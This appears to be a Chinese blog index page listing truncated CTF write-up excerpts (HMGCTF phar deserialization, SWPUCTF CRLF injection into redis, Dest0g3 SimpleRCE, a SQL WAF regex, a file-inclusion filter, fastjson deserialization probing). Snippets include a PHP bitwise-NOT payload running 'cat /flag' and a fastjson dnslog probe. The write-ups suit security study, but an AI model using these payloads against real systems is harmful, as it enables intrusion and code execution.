[HMGCTF2022]Fan_Website
# [HMGCTF2022]Fan_Website
/www.zip 得到源码
审计代码发现题目有个 album 路由,并且控制器只有一个 /module/Album/src/Controller/AlbumController.php
白名单只允许 jpg,jpeg,png 通过
还不能用这些东西,HALT_COMPILER 就是 phar 反序列化,如果可以绕过的话,那就包是 phar 反序列化的
上网搜这个组件的漏洞发现了一个反序列化漏洞 https://xz.aliyun.com/t/8975,那就好说了,我们可以上传一个 phar 文件,然后删除文件调用 unlink...
more...
aliyunctf部分复现
# ezoj:
是一个判题的系统
/source 源码:
import osimport subprocessimport uuidimport jsonfrom flask import Flask, request, jsonify, send_filefrom pathlib import Pathapp = Flask(__name__)SUBMISSIONS_PATH = Path("./submissions")PROBLEMS_PATH =...
more...
[SWPUCTF_2016]Web7
# [SWPUCTF_2016]Web7
进入就是这个,随便 aaa
提示是 python2 的 urlopen 函数,就是 crlf 了,可以用 set admin admin 来设置 admin 的密码,
payload:(%0d%0a 就是回车键(回车换行))通过 urllib 注入 redis。修改 admin...
more...
[Dest0g3_520迎新赛]SimpleRCE
取反
<?phpecho urlencode(~"system");echo PHP_EOL;echo urlencode(~"cat /flag");//(~%8C%86%8C%8B%9A%92)(~(%9C%9E%8B%DF%D0%99%93%9E%98))
more...
[HFCTF_2021_Final]hatenum
# [HFCTF_2021_Final]hatenum
function sql_waf($str){ if(preg_match('/union|select|or|and|\'|"|sleep|benchmark|regexp|repeat|get_lock|count|=|>|<| |\*|,|;|\r|\n|\t|substr|right|left|mid/i', $str)){ die('Hack detected'); }} function...
more...
NewStarCTF_2023_公开赛道Include
# [NewStarCTF 2023 公开赛道] Include 🍐
<?php
error_reporting(0);
if(isset($_GET['file'])) {
$file = $_GET['file'];
if(preg_match('/flag|log|session|filter|input|data/i', $file))...
more...
java反序列化学习笔记
# java 反序列化
漏洞挖掘:
1. 找到发送 JSON 序列化数据的接口
2 判断是否使用 fastjson
非法格式报错
{"x":"
2) 使用 dnslog 探测
{"x":{"@type":"java.net.Inet4Address","val":"xxx.dnslog.cn")}
Burp...
more...